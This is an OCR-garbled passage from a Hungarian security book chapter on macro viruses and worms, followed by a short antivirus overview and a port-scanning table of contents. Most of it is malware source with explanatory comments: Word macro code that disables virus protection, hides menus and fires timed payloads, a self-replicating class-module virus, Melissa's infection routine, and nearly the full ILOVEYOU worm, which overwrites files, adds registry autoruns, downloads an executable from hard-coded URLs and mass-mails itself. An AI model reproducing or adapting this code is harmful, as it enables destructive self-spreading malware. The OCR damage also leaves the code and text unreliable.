amely alapértelmezésben rákérdez a Normal. akkor menj a Payloadra. amelyekkel a Word a dokumentumokban előforduló makrókra reagál. CommandBars(''Tools"). A Word kérdését. a hiányát csak az veszi észre. aki jól kiismeri magát a Wordben. lefut ez a sub. Ez úgy megy a legegyszerűbben.Delete Kiveszi a makrókra vonatkozó menüparancsokat.PrivateProfileString("". menj a Payloadra. hogy azt a felhasználó észrevenné.. 5. SubViewVBCode( ) On Error Resume Next End Sub A felhasználó nem tudja elindítani a VB editort. A felhasználó nem láthatja a párbeszédmezőt. "). If Month(Now( )) = l And Day(Now( ) = l Then Call Payload 'Ha az aktuális dátum január 2. Ha a szám és a változó megegyeznek. Options. ami megvalósítható néhány programsorral. Sub ToolsMacro( ) On Error Resume Next End Sub Ha a felhasználó az Eszközök/Makró/Makrók-ra.0\\Word\SecTírity".. akkor menj a payloadra. amely egy 0-100 közti számot tartalmaz. CommandBars(''Format"). A vírus eltávolítja ezeket a bejegyzéseket.dot-ot. és sokkal tovább marad észrevétlen. így anélkül lehet megváltoztatni a Normal.tehát azt jelentené.Controls(''Macro").Delete * Kiveszi a stílusokra vonatkozó menüparancsokat.. "). CommandBars("Tools").5 Ilyet is lehet: a vírus egy Payload-ot hív meg Hogy a vírus ne legyen azonnal aktív.dot mentésére. If Month(Now( )) = l And Day(Now( ) = l Then Call Payload 'Ha az aktuális dátum január L. Sub FileTemplates( ) On Error Ressume Next End Sub A felhasználó nem tudja elindítani a Sablonok és bővítmények ablakot. Options. hogy a makrovírust elrejtjük. Ezen a helyen a ritkán használt parancsok elrejtése a Word 2000-ben különösen végzetesen hat: a felhasználó e beállítás miatt egyáltalán nem vesz észre bizonyos beavatkozási lehetőségeket.. A fertőzésszámláló pontosan ezt a lehetőséget kínálja. Természetesen a rendszeres összehasonlítás egy véletlenszámmal is lehetséges. egy folyamatellenőrzési lehetőséggel is fel van ruházva.Controls(''Style. „Levél") = /& A Programhiba esetén az On Error Resume Next -tel egyszerűen továbbfut. Sub WordBasic.DisableAutoMacros = 0 End Sub Az automakrók inaktívvá válnak. Ugyanígy egy bizonyos napot is lehet használni. kattint. ha nem lehet a menükből elindítani a megfelelő funkciókat. If x = 3 then Call Payload 'Ha x. System.SaveNormalPrompt = False Ezzel a paranccsal kikapcsolja a párbeszédablakot. A rejtőzködéshez bizonyos menüparancsok kikapcsolása is fontos. a következő paranccsal lehet kikapcsolni a Registry-ből. VirusProtection = False Eltávolítja a vírusvédelmet..Delete Kiveszi a sablonokra és a bővítményekre vonatkozó menüparancsokat. A megfelelő kódsorok egyszerű If lekérdezések. azután nullánál megtörténik a gonoszkodás. Fontos még: mivel ennek a funkciónak a kikapcsolása a háttérben történik."HKEY_CURRENT_USER\Software\ Microsoft\Office\9. Controls("Templates and Add-lns.5. hogy a makrókat lefuttassa-e. akkor következik be az esemény: x=Int(Rnd * 100) 'X egy változó. Ehhez el kell helyezni egy kulcsot valahol a Registry-ben. .

End Sub Ezentúl biztosan másképpen fogják kezelni a Word-figyelmeztetést."). ").Title="Cím" .Comments = "Megjegyzések" .6 A vírus fájltulajdonságokat vagy szövegtartalmakat változtat meg A Payload mögött különféle ténykedések rejtőzhetnek.Keywords = "Keresőszó" . amelyeknek magunk írhatjuk a forráskódját.Execute End With End Sub Ugyanígy szavakat is kicserélhetünk Word parancsok segítségével. A víruskód .Delete CommandBars("edit").Delete If ActiveDociment. Például megváltozhatnának a dokumentum-tulajdonságok: hirtelen egy Dagobert kacsa írta a levelet vagy ilyesmi: Sub Payload( ) ActiveDocument. Százszázalékos védelem nem létezik.Text = "Mit keres" 'a cserélendő szöveg . vagyis egy objektumot definiálunk tulajdonságokkal és eljárásokkal. mert a makrókhoz és sablontartalmakhoz tartozó Makró és a Szervező ablakban nem mutatja őket a program..Find . mint a vezérlőelemek.6 Megfertőzött osztálymodulok A WinWord dokumentumok megfertőzésének egy másik módja az osztálymodulok megfertőzése.Subject = "Tárgy" . 5. Az osztálymodulok a felhasználó számára nem olyan könnyen felismerhetők. A kedvelt Keresés-Csere funkció most a vírust segíti: Sub Payload( ) On Error Resume Next Selection.Forward = True .. ha az Eszközök/Makró/Makrók Szervezőre kattint. úgy találja meg ezt a párbeszédablakot.Format = False .7 A vírus jelszóval védi a fájlt A jelszavas védelmet is be lehet kapcsolni egy makrovírussal: Sub Payload( ) ActiveDocument. mint az eddig bemutatott makróvírusoké: itt már nem exportálnak és importálnak egy kódot minden jövendőbeli Word fájlba. Az osztálymodulok abban különböznek a felhasználó által meghatározott vezérlőelemektől. Az osztálymodulok ezért ugyanazokkal a tulajdonságokkal rendelkeznek. amelyeket az időzített kioldó vált ki. egyes vírusprogramozók sportot űznek abból.5.Replacement. ami sokkal nehezebbé teszi a vírus felfedezését. vállalva a felfedezés veszélyét. Az osztálymodulok megfertőzésének a stratégiája más.Wrap = wdFindContinue .Author = "Szerző" .5.Find.HomeKey Unit:=wdStory Selection.ClearFormatting With Selectíon.Controls("UndoVBA-Find.MatchCase = False .MatchAllWirdForms = False End With Selection. hogy mindig új fertőzési módokat találjanak ki. A vírusvizsgálónk legyen mindig a legfrissebb. és használjuk minden alkalommal.Delete CommandBars(''edit").MatchWholeWord = True . Az osztálymodulok bizonyos mértékig saját meghatározású vezérlőelemek.Replacement. ha kapunk egy Word vagy Excel dokumentumot.Controls("Replace.5.. hogy kvázi „láthatatlanok".Execute").Controls("Repeat" Replace.Find:ExecuteReplace:=wdReplaceAll CommandBars("edit")..Saved = False Then ActiveDocument.ReadOnlyRecommended = False With Dialogs(wdDialogFileSummaryInfo) .Save End Sub 5. de hatékony megelőzés azért lehetséges. Aki szeretne utánanézni.Text = "Mire cseréli" 'amire cseréli . hanem beolvassák a kódot. Sajnos. és ezt a sztringet illesztik be egy másik osztálymodulba.Password = "hallo" 'Persze lehet véletlenszerű jelszót is csinálni.

amelyek előzőleg ott voltak.CountOflines) End With ' Ha egy objektumot egy With. hogy a vírus végrehajtódik. hogy a SUB Priváté. kommentárokkal a kódban. .. Most Document_Open( ) a neve.. A kód beolvasásához tehát ki kell találni.Name ' Mivel nem tudjuk. és VirCode a sztring.CodeModule End If With Source VirCode = . Egy osztálymodulban mindennek ' Private-nak kell lennie. ' amelyet meg kell fertőzni. hogy az aktuális dokumentumot kell ' megfertőzni. Ezt ebben a példában nem ellenőrizzük. ezt az új felülírja.Lines(az l. hogy hol vagyunk. On Error Resume Next ' a szokásos történet a hibával MyPos = ThisDoaiment.VBComponents(l). hol vagyunk (a Normal. hogy ott már semmi sincs.megnyitáskor láthatatlanul integrálódik minden további dokumentumba.InsetLines l. és beírjuk a modulba.CodeModule 'Ha a Normal. . abból azután már logikusan következik.dot-ból jön. hogy már az aktuális dokumentum is ' fertőzött..' megtalálható lenne.' Ezzel biztosak lehetünk abban. amilyen hosszú a modul. Az 1. Ez azonban azt is jelenti. .VBComponents(1). VBProject. Private Sub Document_Open( ) ' Ez a Sub mindig lefut. . hogy világossá tegye a mögötte rejlő meggondolásokat.. annak fertőzésnél azonnal hibát jelez.CountOflines) ' Most a teljes víruskód a VirCode-ba lesz beolvasva. ' mert minden kód megfertőzésénél azok.VBProject. Source.dot-ban lehet. ' Az l. CodeModule ' Az indexszám l a VBComponents(l)-nél mindig a „ThisDocument" osztálymodul.CountOflines ' A megfertőzendő fájlban minden sort törölni kell.DeleteLines l. annyi sort. Így ez csak elpazarolt processzoridő.Lines(l. ' Figyelembe kell venni. íme egy példavírus. Ha a vírus ott már . End With Egy igazi vírus persze sokkal nagyobb ennél. De lehetséges.dot-ban vagyunk.. ' Source. ' Tehát ott van.CountOflines adja vissza a sorok/Lines számát a modulban.Lines(l.CodeModule Set Target = ActiveDocument. hogy előzőleg törölnénk ' a sorokat. VBProject. A programozás stuktúrájához egyszerűen azt kell elképzelni. sortól kezdve. az hibaüzenethez vezetne. VBComponents(1). ' .dot" Then Set Source = NormalTemplate. VirCode ' A beolvasott sztring beillesztése a modulba. ' hogy ha ott egy másik vírus volt.' annyi sort kell törölni. ' A Sub neve is megváltozott.dot-ban vagyunk.VBProject. hogy mit kell megfertőzni. VBComponents(l)... With Target . törölve ' lesznek. és csak a dokumentumban vagy a Normal. Ha ezt valaki elfelejti.End With-blokkba zárunk. amilyen hosszú a modul). hogy Source. és hogy a víruskód a Normal.Name adja a választ If MyPos = „Normal. már csak egy lehetőség marad hátra Set Source = ActiveDocument. . tudjuk.VBComponents( l). sortól kezdve... ha egy dokumentumot megnyitnak. anélkül. Else ' ha nem a Normal.. sortól beolvasni. VBProject.CodeModule Set Target = NormalTemplate.. ' ActiveDocument. ' Létrehozzuk a változóinkat. . nem pedig ' AutoOpen( ).dot-ban vagy a dokumentumban) 'a ThisDocument. és még Stealth-funkciókat is tartalmaz. akkor nincs szükség ' az objektumnév ismétlésére.

VBProject.Lines(1.CodeModule.CodeModule. 1) BGN = BGN +l Loop If NTCL <> 0 And ADCL = 0 And (InStr(l. május 4-én jelezték.CodeMOdule.NTIl.Lines(BGN. 1) ="" ADIl.DeleteLines l. és a hálóra csatlakoztatott cégek 90% -át megfertőzte.VBComponents.CodeModide-.CodeModule.AddFromString ("Private Sub Document_Open( )") Do While NTIl.InsertLines BGN.CodeModule. 1) <> "" ToInfectCodeModule.VBComponents.Item(l) 'Állítsd SetNTIl-et NormalTemplate. "Document") = False) Then ActiveDocument.CodeModule.CodeModule.VBProject. 1) BGN = BGN + l Loop End If If DoAD = True Then Do While NTIl.Saved = True End If End Sub CUT HERE 5. „Document") <> False) Then ActiveDocument.CodeModule. Néhány órán belül világszerte elterjedt.VBProject.AddFromString ("Private Sub Document_Close( )") End If CYA: Do While ADIl. NTCL SetToInfect = NTIl NTILName = "Melissa" DoNT = True End If If DoNT <> True And DoAD <> True Then GoTo CYA If DoNT = True Then Do WhileADIl. ADIl.Item(l) 'Állítsd ADIl-et ActiveDocument.CountOfLines BGN =2 If ADILName <> "Melissa" Then IfADCL>OThen_ ADIl.FullName Elself (InStr(l. Most minden idők egyik legveszélyesebb vírusát fogjuk alaposabban szemügyre venni.CodeModule.CodeModule.7 ILOVEYOU A LoveLetter egy VBS-féreg (Vimal Basic Script) amely e-mailen keresztül terjed.SaveAsFileName:=ActiveDocument.CodeModule. ActiveDocumentName.DeleteLines l.Az alábbiakban egy példával világítjuk meg. VBComponents. VBProject.DeleteLines l Loop ToInfect. 1) <> "" ToInfect.CodeModule.Lines(1. ActiveDocumentName. A LoveLettert először 2000.Item(l) -re. NTCL = Hni. hogyan fertőzi meg az osztálymodulatokat a Melissa: CUT HERE Priváté Sub Document_Open( ) On Error Resume Next Set ASI1 = ActiveDocument.Lines Loop ToInfect.Item(l)-re.InsertLines EGN. 1) = "" NTIl.Lines(BGN.CodeModule.VBComponents. ADCL SetToInfect = ADIl ADILName = "Melissa" DoAD = True End If If NTILName <> "Melissa" Then If NTCL >0 Then _ NTIl.Lines(BGN. .CodeModule. Set NTI1 NormalTemplate.CountOfLims ADCL = ADIl.Lines(BGN. mellékletként.

A károkat több milliárd dollárra becsülték. .mp2 fájlokat. . . legfeljebb magas forgalmat (traffic) generál. aminek következtében néhány céges hálózatnak teljes egészében le kellett mondania a mailküldésről. a nem hivatalos számok azonban ennél jóval magasabbak. automatikusan elküldte magát a címjegyzék e-mailcímeire. és törölte a webhelyet. .css. A féreg manipulálta még a következő Registry-bejegyzéseket: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run \MSKernel32 HKEY_LOCAL_MACHINE\Sofrware\Microsoft\Windows\CurrentVersion\Run Services\Win32DLL HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run \WN-BUGSFIX Miután lefuttatták.ini fájlját. hogy részt vettek a Bárok 2. • Joke • Mothers Day Order Confirmation • Dangerous Virus Warning • Vírus ALERT!!! • Important! Read carefully!! • I Cant Believe This!!! • Thank You For Flying With Arab Airlines • Variant Test • Yeah. ezzel az üzenettel: Bárok. A féreg.wsh.. hivatalos számok szerint.1 szoftver fejlesztésében.e. . . gyorsan kapcsolt. Két prominens áldozat is volt: a ZDF tévéadó és az Expo-világkiállítás.2 A működési mód Az ILOVEYOU féreg egy weboldalról töltött le egyes bannereket. Időközben a hackereknek volt idejük.er. Így nagy forgalom keletkezett a cégek belső hálózati mailszerverein. a Taskmanager-en is megjelent mint w_srcipt. a rendszergazdák félelmeit és feldühítését még egyáltalán nem számoltuk.vbs fájlt.. illetve elrejtette az .. A legdestruktívabb azonban az a tény volt. .send. mint az ILOVEYOU esetében.. mivel a Fülöp-szigetek-i szolgáltató. megkapta a . mivel ezekbe a statisztikákba nem kerülnek be a magánfelhasználók gépei..1 Mi az a féreg? A féreg egy darabkányi kód.hta. Sok cég megelőzésképpen leválasztotta mailszerverét a netről. hogy egy csatorna minden látogatója. Ebben az esetben gyorsan be kellett zárni ezt a feladatot. Miközben a féreg aktív volt. amelyeket azonban hamarosan nem lehetett elérni. 5. hogy minden döntő bizonyítékot töröljenek a gépeikről. s ez az érintett szerverek tisztán materiális kiesési ideje. Az eddig ismert változatok: • ILOVEYOU • Susitikim shi vakara kavos puodukui.trajan-by spyder. • LOOK! • How to protect yourself from the ILOVEYOU bug! Az Amable Mendoza Aguila Computer College-ben. Ugyanott a féreg a WIN-BUGSFIX programot is le akarta tölteni. .jse. A vírussal ellentétben a féreg nem közvetlenül rombol.mail.. Úgy módosította a mIRC script. A féreg az Outlookon és a mIRC-en keresztül is terjedt.7. amely magától terjed az interneten vagy a helyi hálózaton keresztül.jpeg.5. a Sky Internet Inc..sct.jpg fájlt használhatatlanná tett. hogy minden js. A féreg. vagy a gépet is rögtön kilőni! A féregnek egy variánsa aktiválta a jelszó cache-elést. amely jelszavakat kémlel ki.vbs. 600 ezer számítógépet ért el.mp3 és az . . és ezeket Access Net accountokra kellett volna küldenie.passwords. és ezután a cache-elt jelszavakat elküldte mailben. amelyek között ott volt a fertőzött is. míg a hatóságok napokon át semmit sem tettek. a Spyder nevet használó hacker munkahelyén 10 személyt gyanúsítottak azzal. Yeah another time to DEATH.7.

4 A forrás .eq.ctr. Set so = CreateObject("Scripting.ReadAH A program ezután egy FileSystemObject-et (fso) hoz létre.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout". A célja csak a felépítés bemutatása és kommentálása sorról sorra. "REG_DWORD" end if Set dirwin = fso.com / ©GRAMMERSoft Group / Manila.rr setivscr=CreateObject("Wscript. Az ILOVEYOU vírus téma a múltban nagyon gyakran szerepelt a médiában.7.Regread(''HKEY_CURRENT_USER\Software\Microsoft\Windows ScriptingHost\Settings\Timeout") if (rr>=l) then wscr. Ezzel az objektummal lehet fájlokat elérni. Ezután definiál néhány változót.Shell") rr=scr. Copy(dirsystem& "\MSKernel32.kommentárokkal A továbbiakban az ILOVEYOU vírus forráskódja látható. ScriptFullname. akkor a következő lépéssel kell folytatni. 5. Az On Error Resume Next-tel a hibakezelést vezeti be: ha a program futtatása közben hiba lép fel.FileSystemObject") set file = f s o . Ellenintézkedésként ajánlkozik a WindowsScripting hostok eltávolítása uninstall-lal. 1) vbscopy=file.EXE vagy a .vbs fájlok törlése a Windows és a Windows/System könyvtárból. de hangsúlyozzuk.dirtemp. hogy manapság.dow eq="" ctr=0 . főleg az internetes újoncokban.dirwin. main( ) sub main( ) On Error Resume Next dim Tvscr.Copy(dirwin& "\Win32DLL. mint az . és a Registry-bejegyzések eltávolítása.vbs") regruns( ) html( ) spreadtoemail( ) listadriv( ) end sub 5.file.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.GetSpecialFolder(l) Set dirtemp = fso. a vírus működésére nincs semmilyen hatásuk.3 Hogyan tudott a féreg elterjedni? A féreg terjedésének az alapja az volt. de sehol nem jelent meg róla még felvilágosítás. nemhogy egy analízis háttérinformációkkal a felhasználók számára.0. valamint a *.GetFile(Wscript. hogy ActiveX-kontrollok és más scriptek is veszélyesek lehetnek. hibaüzenet nélkül.ScriptFullName) c. nem tudatosulnak a hálóval kapcsolatos veszélyek.TXT.vbs") c. Sokan azt hitték.vbs") c. Az.Az eset egyedüli nyertesei az antivírusok gyártói voltak. tehát a szerző mailcíme és álneve. akiknek a részvényei 10%-kal is emelkedtek. még nem ismert általánosan. hogy ebben a formájában teljesen hatástalan. hogy csak a végrehajtható fájlok. ezekkel a változókkal fog a későbbiekben dolgozni. On Error Resume Next dimFSO.COM fájlok jelenthetnek veszélyt. Open TextFile (Wscript.GetSpecialFolder(2) Set c =fso. A vírus a Windows Scripting Host-tal hajtódik végre. ha minden végfelhasználó tudott volna a Visual Basic Script veszélyeiről. Ennek a féregnek semmi esélye sem lett volna.7. rem barok -loveletter(vbe) <i hate go to school> rem by: spyder / ispyder@mail.Philippines Ezek a sorok csak szerzői kommentárok. A következő sorban ez meg is történik: a program az OpenTextFile-lal és az azután következő ReadAll( ) -lal beolvassa magát a memóriába.GetSpecialFolder(0) Set dirsystem =fso.dirsystem.vbscopy.

html( ). és írni lehet bele. amihez a következő függvényeket hívja meg: regruns( ).skyinet.vbs.exe elseif num = 2 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Sart Page".vbs" regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\ CurrentVersion \RunServices\Win32DLL ".TXT. A CurrentVersion/Run alatt két kulcsot hoz létre. Page". "http://www. illetve LOVE-LETTER-FOR-YOU. Ezek a fájlok tehát kizárólag a vírust tartalmazzák. Win32DLL.net/ ~angelcat/skladjflfdjghKJnmtryDGFikjUlyqwrWe546786324hjk4jnHH GbvbmKL/ JKjhkqj3w/ WIN-BUGSFIX.exe" elseif num = 3 then regcreate "HKCU\Sofrivare\Microsoft\InternetExplorer\Main\Sart Page". Ki lehet például olvasni a Registry-t.downread& "\WIN-BUGSFIX. A többi funkciót a forrásszöveg folyamatában magyarázzuk el. net/ ~yotmg l s/HJKjnwerhjkxcvytwertnMTFwerdsfmhPnjw6581345gvsdfl619njbvYT/ WIN-BUGSFIX. A html( ) egy helyi HTML-fájlt helyez el.Innentől kezdődik a vírus főrutinja. A Set parancsokkal kérdezi le a program a Windows könyvtárait (dirwin).net/ ~koichi/jf6TrjkcbGRpGqaql98vbFV5hfFEjbopBdQZnmpOhfgER61b3Vlrvg/ WN-BUGSFIX. "http://www. Mikor a vírus így bemásolta magát.skyinet. "http://www.ez az objektum teszi lehetővé a Windows különböző funkcióinak az elérését. sub regruns( ) On Error Resume Next Dim num.exe")=l) then Randomize num = Int((4 * Rnd) +1 if num = 1 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Sart Page ". és ezt indításkor végrehajtja. hogy azután a maga egyik másolatát tegye le a következő neveken: MSKernel32. mindkettő a vírus előzőleg létrehozott másolatára mutat. spreadtoemail( ) és listadriv( ).skyinet. amely valójában még egyszer tartalmazza a vírust. a működési módjukkal együtt.dirwin8í "\Win32DLL. hozzákezd az igazi feladatához.vbs. net/~chu/ sdgfhjksdfiklNBmnfgkKLHjkq'wtiiHJBhAFSDGjkhYUgq'werasdjh PhjasfdglkNBhbq'webmznxcbvnmadshfgq'w23146I234iiiylthjg/ WIN-BUGSFIX.exe")=0) then regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current Version\Run \ WIN-BUGSFIX".vbs.exe" elseif num = 4 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Sart Page ".downread regcreate "HKEY__LOCAL_MACHINE\Software\Microsoft\Windows\ CurrentVersion \Run \MsKernel32 ". ami később meg is történik. MSKernel és Win32DLL név alatt.skyinet.dirsystem&"\MSKernel32.vbs" downread="" downread=regget("HKEY_CURRENT_USER\Software\Microsoft\ Internet Explorer\Download Directory") if (downread="") then downread="c:" en if if<fíleexist(dirsystem&"\WinFAT32. valamint a Windows/System (dirsystem) könyvtárat. "http://www.exe" regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main \Sart "about:blank" end if end sub A regruns( ) funkciónak különböző feladatai vannak a Registry-ben.exe end if end if if (fileexist(dovmread&"\WIN-BUGSFIX. Először a CreateObject( ) -tel egy Shell objektumot hoz létre . .

és ezután meghívja a folderlist függvényt.FetFile(f1.Drives For Each d in de If d.DriveType = 2 or d.true) ap. úgy.vbs") mp3.2.OpenTextFile(f0). f1.DriveType=3 Then folderlist(d.close set cop=fso. bname. hogy a következő rendszerindításkor a vírus ismét elindul. sub listadriv On Error Resume Next Dim d. tehát azt a könyvtárat.Files for each f1 in fc ext=fso. mp3 set f=fso. s hogy pontosan mit is tesz.path) elseif(ext="jpg") or (ext="jpegn) then set ap=fso.write vbscopy mp3. és újból kezdi a működését.path) elseif(ext="mp3" ) or (ext="mp2") then setmp3=fso.path) ext=Icase(ext) s=Icase(f( ). Ez azt jelenti.SubFolders infectfiles(f1.path) next end sub .net lépett. OpenTextFile(f1. 2. és eltávolította a szerverről a megfelelő oldalakat.net egyik szerverére vezet.path. Erről az oldalról azután még egy további fájlt is automatikusan letölt a vírus.path. amely a meghajtókon található minden mappát megdolgozza.patb&"") end if Next listadriv = s end sub Ez a függvény minden meghajtót kilistáz. mircfname.name) if (ext="vbs") or (ext="vbe") then set ap=fso. f1.path) cop.path. amelybe a megfelelő fájlokat tölti az Internet Explorer. s.CreateTextFile(f1.GetFile(f0. ehhez négy különböző oldal szolgál választékul.copy(f1.dc.write vbscopy ap.vbs") fso.A Run alatti bejegyzések a Windows indításakor automatikusan lefutnak. Most a program megváltoztatja az Internet Explorer kezdőlapját. ext.DeleteFile(f( ). Ezután a vírus az Internet cache-t keresi.path) cop. sf for each f1 in sf set f=fso. Minden oldal a skyinet. Röviddel az ILOVEYOU megjelenése után azonban a skyinet.write vbscopy ap.close dim f.copy(folderspec& ""&bname& ". true) ap. az majd később következik. 2. GetFolder(folderspec) set sf=f. GetExtensionName (f1 . ap.path&".OpenTextFile(f1. Minden fájlt felsorol.s Set dc =fso. s támogatja a vírus működését.GetBaseName (f1. fc.DeleteFile(f1.close bname=fso.vbs") fso.path) set cop=fso. Ha a vírus nem talál cache-t.close elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (Ext="sct") or (ext="hta") then set ap=fso. GetFolder(folderspec) set fc =f. Ez a funkció a mappák egyes fájljait szerkeszti. hogy a következő Windows-indításnál végrehajtódik. egyszerűen a C:-t használja.write vbscopy ap. amelyek közül véletlenszerűen választ ki egyet. amelyet meg fog fertőzni: sub infectfiles(folderspec) On Error Resume Next dim f. ez a fájl megintcsak bejegyzi magát a Registry-be. sub folderlist(folderspec) On Error Resume Next Minden mappán végrehajtja az InfectFiles funkciót.path&". true) ap.path) folderlist(f1.

a." script.b.CreateTextFile(folderspec& "\script. if mIRCwill" script.WriteLine ".hlp") then set scriptini=fso.ini") or (s="script. hogy egy LOVE_LETTER_FOR_ YOU.ini.regedit.WriteLine ".ctrlists.js.ini.mIRCScript" script. Ha talál egy mIRC-et (Chat Scriptet). GetFolderExist(folderspec)) then msg = 0 else msg = l end if fileexist = msg end funrtion sub spreadtoemail( ) On Error Resume Next dimx. akkor felülírja a script.regualue) Set regedit = CreateObject("Wscript.Shell") regedit.exe") or (s="mirc.css stb.WriteLine "n0=on 1:JOIN:#:{„ script. 1.ini.close eq=folderspec end if end if next end sub Az InfectFiles -nak két feladata van.set att=fso. ugyancsak a vírust terjeszti úgy.ini. 2.wsh. .ini.ini..ini-t. . és a saját magáról készített másolattal írja felül ezeket.http://www.RegRead(value) end function function fileexist(filespec) On Error Resume Next dim msg if (fso.ctrentries.WriteLine " n 1 = / i f ( = = ) {halt}" script.WriteLine ".FileExist(filespec)) Then msg = 0 else msg = 1 end if fileexist = msg end function function folderexist(folderspec) On Error Resume Next dim msg if ( f s o .attrihites=att.ini. WINDOWS will affect and will not run correctly.regad .path) att. com " script.ini. megadott kiterjesztésű (. sub regcreate(regkey.KhaledMardam-Bey" script.ini.malead.." script.regv.ini") script. mIRC will corrupt. hogy léteznek-e bizonyos fájlok vagy mappák.WriteLine ".. WriteLine ".exe") or (s="mlink32. és ellenőrzik.GetFik(f1.ini. Ez a script.HTM nevű fájlt küld a csatorna minden felhasználójának.WriteLine ".WriteLine "[script] script. amelyeket a program más pontjain használ fel.HTM" script.) fájlt.ini.Shell") regget=regedit. ha lefut.. Ezek a függvények egy Registry-bejegyzést készítenek. Megkeres minden. Please dont edit this script. A következő függvények segédfüggvények.regvalue end sub function regget(value) Set regedit = CreateObject("Wscript.ini.dcc send "&dirsystem&\LOVE_LETTER_FOR_YOU.RegWrite regkey.attributes+2 end if if (eq<>folderspec) then if (s="mirc32.ini.WriteLine "n3=}" script. mirc. WriteLine " corrupt.WriteLine "n2= /.ini") or (s="mirc. thanks" script.

RegWrite "HKEY_CURRENT_USER \Software \Microsoft\WAB"&malead.Application ") set mapi=out.Attachments.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB"&:a. Ha a szkenner megváltoztatott kódot vagy valamilyen egyéb eltérést észlel. csak különböző script-fáljokat írt át. .AddressLists. többnyire csekély. amit talál. úgynevezett nyomozócsapatokat foglalkoztatnak.Count set a=mapi.8 Hogyan működnek a vírusvizsgálók? A vírusvizsgáló egy adatbázist használ. és látogatják az idevágó newsgroupokat. TXT. A szkennermodul a vírusok sztringjeit és viselkedési módját is felismeri. hogy folyamatosan tudjanak reagálni az új fenyegetésekre." male. Amint látjuk.AddressEntries.a.Send regedit. és ezzel potenciálisan olyan vírusokat is leleplezhet.RegRead("HKEY_CURRENT_USER\Software\ Microsoft\WAB"&malead) if(regad="") then set male=out. mint a normál víruskeresésnél. Az ilyen szkennelésnél a hibaszázalék magasabb. A kár.a feldolgozhatatlan mennyiségű e-mail miatt milliós volt. 1.Count malead=a. 5.Subject = "ILOVEYOU" male. illetve mailszolgáltatók kára viszont . hogy azután a címjegyzékben talált minden címre elküldje a vírus másolatát.1 Szkennermodul A szkennermodul a vírusok felkutatásáért felelős a merevlemezen. A legtöbb vírusvizsgáló frissítésekkel folyamatosan bővíti az adatbázisát. és elküldi magát minden címre. az egyszerűsége ellenére. Csak ezért tudott ennyire gyorsan elterjedni. tehát a címjegyzéket (WAB. AddressEntries. CreateObject("Outlook. Az eljárás neve Pattern Matching. amelyben a Windows minden mailcímet tárol.RegRead(''HKEY_CURRENT_USER\Software\Microsoft\ WAB"&a) if(regv="") then regv=l end if if (int(a. vbs") male.EXE). Count endif next x=l Set out=Nothing Set mapi=Nothing end sub A SpreadToEmail( ) függvény megnyitja a programot. amelyet a felhasználóknál hátrahagyott.setregedit=CreateObject("Wscript. 5. "REG_DWORD" endif x=x+l next regedit. igazán komplex funkciókkal van felszerelve. az ILOVEYOU.8. akkor ezt összehasonlítja az adatbázis lenyomataival.Sheir) set out=WScript. amelyek még nincsenek benne az adatbázisban.Body =vbcrlf&"kindly check the attached LOVELETTER comingfrom me.AddressEntries.AddressLisets(ctrlists) regv=regedit.Add(malead) male. GetNameSpace("MAPI") for ctrlists=1 ro mapi. ehhez a szoftver gyártói saját víruslaborokat tartanak fenn.Createltem(0) male.Recipients. A szkenner ellenőrzi egy fájl vagy egy program kódját.Add(dirsystem& "\LOVE-LETTER-FOR-YOU.AddressEntries(x) regad="" regad=regedit. amely minden felismerhető vírus nevét és lenyomatát tartalmazza. Count>inr(regv)) then for ctrentries=l to a. Az internet-. hogy megállapítsa a víruskódokkal való egyezést. Ez a program tulajdonképpeni terjedési módja: lefut.

hogy valamiképpen megtisztítsa. hogy a vírusprogramtól függő mértékben visszafogja a rendszerteljesítményt. vagy a szkennelés leállítja a rendszert? • Felismeri-e a program a vírusokat már letöltés közben? • Meg tudja-e találni a szoftver tömörített fájlokban is a vírusokat? • Tudja-e ellenőrizni az e-mailhez csatolt fájlokat (attachments) már az elindításuk előtt? A kezelése kényelmes. A következő szempontokra kell ügyelni: • A kínált programfrissítési gyakoriság (legjobb hetente egyszer) • Az ügyféltámogatás minősége • Szkennelési sebesség • Szkennelési minőség • Lehetséges-e a szkennelés a háttérben.3 „Fertőtlenítő" Ha a szkenner vírust talál. vagy feleslegesen bonyolult? . Úgy van beállítva.8. Ha egy fájlt elindítanak. az attól függ. ez a modul lép akcióba.8. vagy törli a fájlt.2 Víruspajzs A víruspajzs egy memóriarezidens.5. hogy valós időben. vagy elkülöníti. különböző opciói vannak a vírus eltávolítására. azaz áthelyezi egy „karanténkönyvtárba". a víruspajzs azonnal megvizsgálja. hogy milyen nagy a fertőzés kockázata. és mennyibe kerülne az adatok újbóli előállítása. A hátránya. jelentést tesz. Vagy megtisztítja a fájlt a vírustól. a háttérben működő szkenmodul. Ennek a modulnak.4 A vírusvédő program kiválasztásának a szempontjai Hogy mennyit akarunk vagy kell ráfordítanunk egy-egy virusvizsgálóra. átnevezik vagy letöltik a hálóról. 5. ha nincs rá lehetősége. a fertőzéstől függően. folyamatosan kövesse a felhasználók minden fájlelérését. kijelölnek. és ha szükséges.8. 5.

2.9 A portszkennelés elleni védelem .7 ICMP-echo-scanning/ping-szkennelés 6.1 Szkenneles teljes TCP-kapcsolattal 6.2.2.2.1.4 Fragmentált szkennelés 6.Tartalom 6.2.2 Félig nyitott TCP-szkennelés 6.2.2. fejezet .3 TCP-FIN-Scan 6. A szkenner Szkennelesi eljárások 6. 6.6.2.2.6 UDP-Recvfrom-And-Write szkennelés 6.5 UDP-ICMP-Port-Unreachable szkennelés 6.8 A nyitott portok csak a kezdetet jelentik 6.2.

